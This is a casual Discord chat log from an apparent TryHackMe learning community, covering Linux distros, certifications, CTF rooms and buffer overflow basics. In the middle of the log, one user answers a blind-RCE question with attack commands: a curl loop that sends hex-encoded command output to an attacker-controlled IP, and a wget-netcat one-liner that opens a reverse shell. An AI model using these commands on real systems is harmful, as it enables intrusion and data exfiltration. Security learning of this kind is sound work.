Oh hey man lol. You still doing code academy? I've actually been working on my own platform for teaching info/cyber security to people but its going to be more directed towards one-on-one and small groups as I will be instructing live and then having labs for the people learning. @steep scroll

steep scroll
#

@slender gulch I quit Codecademy bro, now I'm learning on TryHackMe

slender gulch
#

Ahh, so this is a learning environment then?

steep scroll
#

Yes

#

You should check it, it's very well made lad, even trough I think you need more than one websites and courses to grasp hacking and all it has to offer. (even trough bug bounty will be the main goal) @slender gulch

#

@slender gulch I kinda want to test the beta of your platform lad, i'm willing to pay to be honest

#

Tell me mow bout it

quaint elm
#

What you doing? @olive sundial

olive sundial
#

Not much @quaint elm , just got a few Teams meeting with some client currently

quaint elm
#

Oh, work.

olive sundial
#

yeah :c

#

otherwise i can't pay for my studies and certs

graceful coral
#

How do you configure smtp server in nessus correctly?

quaint elm
#

otherwise i can't pay for my studies and certs
@olive sundial True enough

olive sundial
#

Yess lool

tame ledge
#

๐Ÿฐ ๐Ÿฐ

olive sundial
#

yeah, seems very live this channel

random drum
#

does anybody know which hash algorithm pi hole uses to store passwords?

tropic lava
#

Sounds like you should investigate

#

It's on github

random drum
#

ok

#

thanks

#

any idea what hash type this is "173af653133d964edfc16cafe0aba33c8f500a07f3ba3f81943916910c257705" ?

tropic lava
#

/etc/pihole/setupVars.conf

random drum
#

yes i found that path but i need to know what hash algorithm it is

tropic lava
#

How do you know it's hashed?

#

I haven't found any code that hashes passwords yet

random drum
#

bcs i know what i set as password

#

123

#

lol

#

and that whats safed in the file "173af653133d964edfc16cafe0aba33c8f500a07f3ba3f81943916910c257705"

#

Sha256 ?

tropic lava
#

Check the length

#

Use hashid, idk

last marlin
#

@pale cove Hey dude, after you made your points about Parrot, I kinda wanted to test Parrot, so I installed it.. hope im gonna like it )

graceful coral
#

I'll defend parrot over kali

last marlin
#

first thig i have nosticed, the font size is small overal

#

by default

pale cove
#

@pale cove Hey dude, after you made your points about Parrot, I kinda wanted to test Parrot, so I installed it.. hope im gonna like it )
@last marlin let's go :)

#

you are going to love it!

#

also try customizing the MATE terminal

#

transparent background looks really good

last marlin
#

@last marlin let's go :)
@pale cove I will say one thing, I love this community, so anything that will be advcie to me, least i will do is test.. for now im just installin software. I have chosen KDE, loved it lately, btw was advcied to me just like you did Parrot ๐Ÿ™‚ I have installed deepin-terminal. but will see how mate terminal looks

pale cove
#

good! i really like that attitude!!

#

treating stuff as an advice and actually forming a personal opinion after testing is insanely good social quality!

tropic lava
pale cove
#

๐Ÿ™

tropic lava
#

It's all about finding what you like

pale cove
#

oh yeah ^^

last marlin
#

First positive thing, in kali I would have to add kernel parameters to grub for my AMD R9 390 (otherwise I would get black screen every 5-10min) in Parrot i have changed nothing yet, no black screen at all

fair shell
#

Keep posting. I'm thinking about switching to parrot

pale cove
#

Kali also had some problems with my WIFI adapters while parrot instantly understood them and installed everything needed

#

there's a lot of this small stuff which makes me like parrot more

fair shell
#

In Kali I have to restart the Bluetooth service every time I boot up to connect my headphones. That's inconvenient

tropic lava
#

Are you daily driving kali?

fair shell
#

Yes

tropic lava
#

Please tell me it's 2020.1 or something

#

Non root default

random drum
tropic lava
#

That's disgusting

fair shell
#

It was root default when I installed. And yes it's 2020.1 now

tropic lava
#

Don't use root user for daily driving

fair shell
#

Yes. I have created non root account for daily driving

cobalt spruce
#

is kali safe for daily driving?

#

i use arch btw. ๐Ÿ˜„

last marlin
#

In Kali I have to restart the Bluetooth service every time I boot up to connect my headphones. That's inconvenient
@fair shell I would have that problemem with my wireless sub woofer, but I made bluetooth servers run automaticy, after that after i turned my speakers on it would overide my headphones, make your bluetooth services run at startup, Stacer is a nice app to do that.

pale cove
#

non-root is safe

last marlin
#

Don't use root user for daily driving
@tropic lava I think some programs even dont work properly wth root user

#

chrome comes to mind

tropic lava
#

Chrome/Chromium, a lot of programs also display warnings

cobalt spruce
#

but if you make a simple user dont you have to configure other things too. I had a feeling that Kali was never designed to be safe.

tropic lava
#

Nope

#

Kali 2020.1 is designed to be used by a non root user

cobalt spruce
#

ahh ok, pardon didnt know that

fair shell
#

@fair shell I would have that problemem with my wireless sub woofer, but I made bluetooth servers run automaticy, after that after i turned my speakers on it would overide my headphones, make your bluetooth services run at startup, Stacer is a nice app to do that.
@last marlin thanks I was thinking about cronjob

last marlin
#

in kali its off by default

fair shell
#

Bluetooth service is already running after boot up. But doesn't detect my headphones. That's why I need to restart the service. And there were other issues with wireless device. Had to google for quite some time to resolve.

last marlin
#

@fair shell btw, could you send a screen of default fonts in kali ? I have this feeling some fonts a too small, would like to compare them with parrots fonts

last marlin
#

non-root is safe
@pale cove Did a start up test, 11.08 sec. im not sure how long it was by Kali, but not that quick..

pale cove
grand scroll
#

mr robot ctf atm

#

if anyone wanna watch and help XD

fast flint
#

How does rank works

#

!rank Madness

median palmBOT
#
TryHackMe
!rank

*Morpheus*: Red or Blue pill?

Username:

Madness

Rank:

710

Points:

4468

Subscribed?

No!

last marlin
#

:jump:
@pale cove lol

olive sundial
#

you still alive @pallid orchid ?

#

haven't seen you in ages

pallid orchid
#

yea, been pretty busy. 2020 is the year everything changes for me

olive sundial
#

awww how come? hope you've been okay

last marlin
#

I would google this but i dont know what to look for. As you can see on the screen there are 2 shells, default one and below is the fish shell. Is it pssible to keep the above form and still use the fish shell ? what should i look for if i wanted to google ?

urban crescent
#

yes

#

the prompt is stored in .bashrc

last marlin
#

Thank you i will see what i can do

fair flower
last marlin
last marlin
#

the prompt is stored in .bashrc
@urban crescent If i make changes in that file, does it affect fish shell ?

urban crescent
#

no

#

bashrc

#

!= fish config

last marlin
muted bramble
#

@muted bramble Although certifications do stick out alot more than a degree from college, employers also really want to see experience as well. You could certainly do OSCP as your first cert but that may be a bit much if you are just starting off. If its your first security cert, I recommend Security+, GSEC, etc.. I personally got my certified ethical hacker prior to OSCP but that was back yonder as I am CISSP-ISSEP now. it all boils down to what you are specifically wanting to do in a job. Do you have previous work history in IT or security?
@slender gulch
thank you Leroy no I donโ€™t have any experience working in IT security and yes Iโ€™m basically starting off but Iโ€™m really at it and love it... so what you think would be a good way to plan certs? Start off w ethical hacker gsec and sec+?

tropic lava
#

@knotty knot

knotty knot
#

@tropic lava thank you so much ๐Ÿ™‚

limpid tundra
#

Headphones

quaint elm
#

@lethal egret You learning buffer overflows?

lethal egret
#

Only basic

#

Just need to know enough to get through oscp

#

then I can ignore it again

quaint elm
#

lol

#

WIndows?

lethal egret
#

yeah x86

quaint elm
#

God help you dude.

lethal egret
#

They aren't that bad xD

slender gulch
#

@lethal egret Lol buffer overflows are a blast.. ish... sometimes.. haha. Do you know any C languages, perhaps any assembly, or how stack with memory works?

#

Actually, let me take a step back. Do you have any experience with code execution (arbitrary) and privilege escalation? Those couple of things as well as what I mentioned above are some items that you need to be familiar with when working with buffer overflows.

quaint elm
#

He's very much familar with those stuffs, afaik.

lethal egret
#

Not a clue about any of them

#

๐Ÿ‘€

#

wut is code execution?

urban crescent
#

optional why are you like this

fast flint
#

@slender gulch interesting, mind if we open small discussion on assembly

graceful coral
#

code execution is a myth created by the government

lethal egret
#

optional why are you like this
@urban crescent can you help me learn code execution?

graceful coral
#

Damn yall are straight speaking foreign, those two words together don't even make sense

urban crescent
#

overwrite the buffer, identify the offset of the eip with pattern create, jump to a location in memory where you'll be able to execute your shellcode, detect bad chars, gen shellcode, ???? profit

lethal egret
#

but sir

urban crescent
#

do it

#

you knob

lethal egret
#

I don't know privilege escalation

urban crescent
#

sir

lethal egret
#

will this give me default user?

reef plover
#

hey I have a question about VPNS I have NordVPN but I don't think you should use virtual private network service provider so I don't really know if I can use it

lethal egret
#

๐Ÿค”

#

does vpn give code execution

fast flint
#

Does anything give code execution ๐Ÿง

quaint elm
#

Oh wait, I forgot. optional just started learning hacking few weeks ago, iirc.

#

overwrite the buffer, identify the offset of the eip with pattern create, jump to a location in memory where you'll be able to execute your shellcode, detect bad chars, gen shellcode, ???? profit
@urban crescent Hope it was that easy these days, "Smashing Stacks for Fun and Profit".

#

nteresting, mind if we open small discussion on assembly
@fast flint Go on.

fast flint
#

To give small history I have done some Assembly Programming on different MC and M by OEM like ARM

#

Noticed different OEM uses different command eg mov A,#01 = LD A,01

#

Letโ€™s some your trying to attacked these machine with buffer overflow how you would approach it

quaint elm
#

No experience on ARM.

fast flint
#

Alot of newer Iot devices are on ARM

#

Potential exploits ๐Ÿง

#

Just broke dogcat exploit trying to automate exploit ๐Ÿ˜… time to restart

slender gulch
#

@fast flint Yeah no problem at all. Im more than happy to help out with anything!

#

Im headed home from the office now, going to stop a pickup some breakfast and then ill be back on the computer and can help

grand scroll
fast flint
#

@slender gulch looking forward

slender gulch
#

@fast flint Im online

fast flint
#

@slender gulch welcome

slender gulch
#

Were you wanting to do voice or did you have just a couple questions?

fast flint
#

Before we start i am coming from EE eng maindset

#

@slender gulch couples

#

Correct if i am wrong how memeroy handle ibstruction either FIFO or LIFO and so on

#

Will that impact how we develop the exploit

slender gulch
#

@fast flint can you do voice?

fast flint
#

Ok

#

Just give a second to download discord on laptop

slender gulch
#

I think I understand what you are asking. So there are two types of buffer overflows per say. You have the commonly used stack based and then there is heap based. Regarding LIFO and FIFO, Stack is LIFO and Queue is FIFO. So when creating your exploit/payload, you would need to ensure you are targeting the proper data buffer. @fast flint

fast flint
#

I am back

slender gulch
#

Did my response above answer what you were asking? If not, if you could elaborate in detail a bit more that would be great

fast flint
#

yes

#

@slender gulch tipsfedora

slender gulch
#

@fast flint awesome! Let me know if you have any other questions ๐Ÿ™‚

fast flint
#

do not want to waste your time I will be reading more ๐Ÿ™‚

slender gulch
#

@fast flint Certainly not wasting my time at all. I enjoy helping and teaching others. Please dont hesitate to ask ๐Ÿ™‚

#

InfoSec/CyberSec (IT/Computers Overall) isnt just what my career is in, but its also my passion and I enjoy all aspects of it including teaching. As they say, you never work a day in life loving what you do.

fast flint
#

@slender gulch well said. I choose my major because I book called Z81 Assembly.

#

The programming in was hard any mistake and you have to do it from start but it was fun.

slender gulch
#

Very nice. I didnt do the college route but rather focused on certifications. As of now, I'm a DoD 8140 (Dept of Defense Directive) CISSP-ISSEP, CCNA Cyber Ops, CCNP Security, ECSA, CEHv10, LPT (master), and OSCP/OSCE/OCEE. That's one of the very fortunate things about the IT industry is 99% of the time, employers could care less about a college degree. When I review resumes/conduct interviews, I look at experience and certifications.

fast flint
#

@slender gulch different regions has different view points on that subject. nevertheless it about doing what you like and the eagerness for knowledge. tipsfedora

last marlin
#

Very nice. I didnt do the college route but rather focused on certifications. As of now, I'm a DoD 8140 (Dept of Defense Directive) CISSP-ISSEP, CCNA Cyber Ops, CCNP Security, ECSA, CEHv10, LPT (master), and OSCP/OSCE/OCEE. That's one of the very fortunate things about the IT industry is 99% of the time, employers could care less about a college degree. When I review resumes/conduct interviews, I look at experience and certifications.
@slender gulch MA man.. well done sir.. and thanks for offering your help,. Sharing is carring as we all know.

#

On the other note, Loving Parrot..

last marlin
#

this is deb server not responding right ? I have done no changes to my pc at all, wasnt even at home all day.. so I assume its one of the servers that is down

lavish iron
#

@slender gulch could you tell me a bit more about the DOD stuff? tried looking it up but the SANS website is a bit finnicky and.. well not clear at all

grand scroll
#

cheers

latent stirrup
grand scroll
#

anyone did jigsaw ?

tropic lava
#

@grand scroll Probably the wrong chat?

grand scroll
#

wops XD

last marlin
slender gulch
#

@lavish iron I changed my nickname but its Leeroy. Did you have any more specific things you wanted to know about? Specifically related to cyber security and the DoD, check this out. https://www.sans.org/dodd-8140/

final herald
slender gulch
#

@last marlin there could be a few reasons you are getting that issue. Without knowing more details, try doing this.

sudo apt-get update && sudo apt -y dist-upgrade

sudo apt autoremove && sudo apt autoclean

sudo apt-get install -f

If that doesnt work, run sudo apt-get check and let me know the results. In that case you will more than likely need to force manually removing each package and then reinstalling. Feel free to pm me.

last marlin
#

I have done all above, and apt check output is : invalid operation check

slender gulch
#

Ahh I see. Send me a PM and ill get yah fixed up

tropic lava
#

@slender gulch Stop using apt-get

last marlin
#

๐Ÿ˜„

#

I have noticed that too

#

get-apt

slender gulch
#

ITS A HABIT haha

formal iron
#

hehehe

graceful coral
#

@formal iron Fun room, good job ๐Ÿ™‚

formal iron
#

Cheers dude! Thanks for the feedback - glad you managed to get through it @graceful coral :^

graceful coral
#

I did, just that one wee stumble at the start lol

last marlin
#

@formal iron Fun room, good job ๐Ÿ™‚
@graceful coral what room ?

graceful coral
#

MAL: Strings

last marlin
#

MAL: Strings
@graceful coral Riiight, just noticed it. alrdy Joined

vale citrus
#

hello where I can get any more references idea about blind rce , I've found some on youtube. but on my case I'm not allowed to back connect. I just don't know how I'll be able to fire my command and see the out since its an blind.

tropic lava
#

You don't see the output

#

That's the point

#

That's what makes it blind

urban crescent
#

@vale citrus Suggestion on how to proceed:

  1. turn tcpdump on and filter for icmp requests
  2. have the remote box to ping you to confirm rce

Method 1.

  1. Host a SimpleHTTPServer with python
  2. execute somethjng like this:
for LINE in `ls -la | xxd -r -p`; do curl http://<your ip>/$LINE; done

Method 2.
wget http://yourip/netcat -O /tmp/netcat && chmod +x /tmp/netcat && netcat <your ip> <your lport> -e bash

#

thatll encode the output of ls -la into hex and stick it into a loop that'll send the hex output to your python simple http server thats listening for incoming requests.

#

you'll take the incoming requests to the server and decode the hex and you should see the output of ls -la.

vale citrus
#

thanks @urban crescent

tropic lava
#

@slender gulch please keep the nicknames PG13 too

slender gulch
#

@tropic lava Ahh my apologizes! Fixed it.

last marlin
urban crescent
#

@leaden wraith heads up, it's against the rules of the discord to randomly DM people. Ask before you DM.

formal iron
#

I think probably #522158404614225920 is your best bet @graceful coral! Would like to hear it either way ๐Ÿ™‚

#

It's good to hear feedback/ideas for both sides of the fence :^^

quaint elm
#

@graceful coral I'm not Jason Todd

#

:p

pale cove
graceful coral
#

sh*t I thought it was damian wayne

quaint elm
#

lol

graceful coral
#

I don't know my lore very well

#

what tragedy happened to your robin @quaint elm

quaint elm
#

Nothing.

#

He's a spoiled brat, good with stuffs and always trying to prove himself.

#

Probably.

graceful coral
#

damn

#

did he like become the joker

#

doesnt everyone become the joker

quaint elm
#

At some point, Joker almost got him but Batman saved him.

graceful coral
#

ah

#

why couldn't he have saved Jason Todd ;-;

quaint elm
#

One of the thing was, before the Flashpoint Paradox(pun) happened, his own Mom killed him imao.

#

True.

#

Go to sleep @graceful coral

pale cove
#

Go sleep

glacial shard
#

wait... batman got married

pale cove
quaint elm
#

wait... batman got married
@glacial shard With catwoman, yes.

#

Their wedding and Joker and Harley wedding were at same time, iirc.

glacial shard
#

what

#

the

#

actual

#

f*ck

#

well, I learned something today

#

I can go back to bed

quaint elm
#

lol

#

@olive sundial How so?

olive sundial
#

idk :/

quaint elm
#

:/

olive sundial
#

yeah, just sometimes feeling left out

ornate crag
#

Hey guys. Hope you're all well.

Do you guys have any ideas for a research topic/problem based on social engineering?

pale cove
#

Study psychology

topaz tulip
#

@prime helm When you can DM me. is everything okay?

quaint elm
#

yeah, just sometimes feeling left out
@olive sundial I feel too that way, but remember at the end, we all are from one community :)

olive sundial
#

i know haha, don't worry ๐Ÿ˜›

#

the big THM family

#

raised by daddy @restive tartan and mommy @strange axle

#

and Ashu as the father in law

quaint elm
#

Mommy being the DarkStar lol.

#

Then we are siblings, most probably.

pale cove
#

Yes

#

some of us are step-siblings

#

the ones who come from HTB and JHDiscord

quaint elm
#

Mods are older siblings, mentors are younger ones lol.

#

Ah, right.

#

No wonder we all get along so well.

pale cove
#

Mod - older sibling
Mentors & creators - Middle child
Members - youngest

quaint elm
#

True.

#

But I still can't control the laughing that DarkStar is mommy.

pale cove
#

hehe true

#

๐Ÿ˜†

olive sundial
#

OMG

#

OMGGGG

#

MGGGG

empty sorrel
#

omg YES, china rootkit here we come

waxen dirge
#

WHAT WHERE'S MY VALORANT

olive sundial
urban crescent
#

i shoulda sold my valorant key kekw

fast flint
#

let me say it out laud I HATE BRUTE FORCE

lavish escarp
#

@strong crown dyslexia just played hard on me i read your name in the koth channel and lets say i said somethign in my head that made that sound real bad

strong crown
#

you are the third person to tell me that. i'm sorry. it wasn't intended

lavish escarp
#

i know its just one of those thigns were if you dont read it right your brain fills in gaps that wernt there

graceful coral
#

@olive sundial are you about to become a valorant addict

last marlin
#

What would you suggest the number of threads when using Dirbuster ?

patent rain
#

depends on your network connection

last marlin
#

its 100+ mb

patent rain
#

i'm usually using 16/24 on a 80Mbps

#

but i'd say more would be still safe

#

try scanning with different ones and scale back when they start to timeout or when it throws errors

last marlin
#

I sometimes put 200.. sometimes it does give me errors

#

I will do testing, thank you

last marlin
#

im getting so much ingored lately in help room.. anyone has finished joker room ?

tropic lava
#

@last marlin I haven't seen you post there

last marlin
#

@last marlin I haven't seen you post there
@tropic lava well im posting there, dont wanna post again to avoid something like : dont make double post.

#

I understand there are a lot new guys that might need help more than me

#

no hard feelings

last marlin
#

While using KDE, and i have downloaded parrot-sec KDE during the update, why do i have gnome system-tools in my upgrade list ? why would anything of gnome be in my system ?

#

just wondering

tropic lava
#

@last marlin Was the bug with the joker room the image thing?

last marlin
#

@last marlin Was the bug with the joker room the image thing?
@tropic lava well I came to that point later on, but my mistake was that I wasnt using nikto with credentials, so I wasnt seeing that backup files.. You live and you learn.

graceful coral
#

how do you manage your time of learning? any specific time for learning any specific topic?

last marlin
#

who, me ?

graceful coral
#

When I feel in the mood to do some hacker shit I do it

#

vry freeform

lavish escarp
#

so seriously off topic but kinda on but kali kinda killed both clover and windows bootloaders now admitted the clover one sucks as it means my hackintosh is unbootable for the forseabel future as it took me 2 months to get that copy bootable but my main issue is i cannot recover my windows bootloader some how no matter what i do with bootsect or bootrec in windows recvoery cmd promt i get system cannot find file sepcifed when i try runnning bootrec /Fixmbr or /FixBoot i tried bootsect /nt60 sys that did nothing either so im kinda at a loss as i really dont want to reinstall windows right now any advice woudl be gretaful

graceful coral
#

backup your data with a live boot and just reinstall windows

lavish escarp
#

yeah its looking liek the onyl option right noiw

graceful coral
#

if you already tried bootrec and bootsect, itd be more difficult to fix your bootloader than it would be to reinstall

lavish escarp
#

im booted into my installed kali it was gettign rub to work that i think killed my other bootloaders

#

yep the only sucky thing about that is reinstallign shit of microsoft store because no microsoft have to be awkward and you cant redetect old isntalls of stuff like forza thats almost 80 gig

#

steam library is fine atleast that would be actuall suicide if i lost that he says with it all onn a fakeraid0

#

@graceful coral thanks for the advice tho even if it isnt what i wanted to hear its what i suspected

graceful coral
#

Windows.old noises

lavish escarp
#

wait can you reimploment stuff from windows.old registry??

#

cause if thats possible i could dump the reg keys from windows.old annd reinstated them in the new install and recover window store stuff

last marlin
#

I'm never fully satisfied with any Microsoft product. Bill Gates.

nova lynx
#

@graceful coral HELLO?

tropic lava
#

@nova lynx I see you there. Reacting to my messages

nova lynx
#

Yeah

#

I miss my THM squad

#

It's been a crazy few days

graceful coral
#

@nova lynx HELLO

tropic lava
#

Hope you're good

nova lynx
#

I feel like we're all on at different times now.

#

Likewise @tropic lava

tropic lava
#

I'm on US West Coast basically at this stage

nova lynx
#

As for @graceful coral, we aren't friends anymore.

#

Yeah, I've noticed that with you James.

graceful coral
#

I'll bitch at you after im done with symphonos 6

nova lynx
#

Oh wow

#

I loved that room

graceful coral
#

same

nova lynx
#

DM me

lavish escarp
#

erm does anyonne no how to get discord screen share working in kali for soem reason its jsut black screen with cursor

tropic lava
lavish escarp
#

ahh foudn thhe issue im running wayland now i gotta remeber how to swap to xorg

#

ahh well that was alot less painfull thaty i expected just uncommenting one thing haha

#

dang discord screen share destroys my cpu usage my audio goes seriously crackly

last marlin
#

Anyone using timeshift ?

cobalt thicket
#

RIP Sarcon CTF

quaint elm
#

That was meant to happen and this is not the first time a CTF conducted by SecArmy went to this condition.

wise robin
#

anybody who used aircrack gotten segmentation fault 11 after sending deauthentication frame?

#

I should clarify, I'm trying to break into my OWN network, not somebody else's - i'm not a dick

pseudo escarp
#

Does anyone use a non-specific pentesting distro for cybersec?

pale cove
#

@pseudo escarp do you mean like self-built?

#

you can easily install ubuntu or kali light and download everything you need

pseudo escarp
#

I.e using Ubuntu as a daily driver & for pentesting

pale cove
#

i use parrot home edition for that

pseudo escarp
#

Will look at Parrot ๐Ÿ™‚

pale cove
#

it's great

#

also has some good pre-installed stuff

cobalt thicket
#

I know some people that moved to a dev build of windows for WSL 2, but you lose access to hypervisors other than Hyper-V with that

pseudo escarp
#

Planning a pc build in a few months and was thinking Windows for occasional gaming + 3d modelling and Ubuntu for dev & pentesting - Katoolin seems good.

hearty timber
#

good morning

urban crescent
#

WSL2 good, but bad

#

not worth it imo

nova lynx
#

@latent stirrup we miss you ๐Ÿ˜ข

latent stirrup
#

I too miss me

#

Been playing with my new toy

graceful coral
#

May someone explain me what is PSH?

tame ledge
#

@graceful coral It stands for Powershell.

graceful coral
#

oh

#

thank you

pseudo escarp
#

@latent stirrup ooh lots of cores haha

hearty timber
#

yo

nova lynx
#

OC .dat thang

latent stirrup
#

Ayyy my brother

#

Represent the 12core

cobalt thicket
patent rain
#

:0

#

only 4 cores here on this 2200G

cobalt thicket
#

pog

#

Just spent 30 mins trying to figure out why my code was generating one more object that it should've

nova lynx
#

Can everyone do me a quick favor?

cobalt thicket
#
for i := 0; i <= amount; i++ {
for i := 1; i <= amount; i++ {
#

Spot the difference

nova lynx
#

1 0

cobalt thicket
#

Because apparently I can't KEKWG

nova lynx
#

๐Ÿคฃ

patent rain
nova lynx
#

I'd appreciate it.

#

I have a plan evil

patent rain
#

wait, didn't they fix the contact one a while ago?

nova lynx
#

I created the contact crash

#

I reported it as well, they didn't even reply to me.

#

I am Ryan ^^^

patent rain
#

figured that out lol :D

i found someone using it and investigated but like a week later it didn't work

nova lynx
#

Yeah it still "works" just crashes you locally, no one else kekw

patent rain
#

lmao

nova lynx
#

But the Custom Connections still work.

#

@formal sparrow created a GUI for people that can't figure out how to execute Python.

patent rain
latent stirrup
#

I got ya my dude

#

Big โญ

nova lynx
#

Thank you โค๏ธ

urban crescent
pseudo escarp
#

Can't wait for AMD 4000 Desktop or 5000 series

safe citrus
#

@cobalt thicket the ctf is running smooth now hope you'll like the challenges ๐Ÿ™‚

cobalt thicket
#

How long's left? Might take a peek in a bit

safe citrus
#

@quaint elm we had conducted 3 CTFs previously with a good number of audience ,just some issues happened this time

#

How long's left? Might take a peek in a bit
@cobalt thicket 7 hours ig

#

6hrs 38min

last marlin
#

I too miss me
@latent stirrup niiceeeeee, been meaning to buy that too, but I bought some other toy, electric step ๐Ÿ˜„ What did you have before that cpu ?

graceful coral
#

well this is it

tropic lava
#

Pars you ok?

ancient warren
last marlin
#

Hey guys, I have noticed something in linux.. It was in KAli, now i have it in Parrot. For example, 2 programms i have installed. Stacer(optimizer) and Visual studio coding, but afer some updates i see that i have to install them again, cuz they are kinda gone from my system, what could that be ?

graceful coral
#

Yes

#

Do that

#

Be a smart guy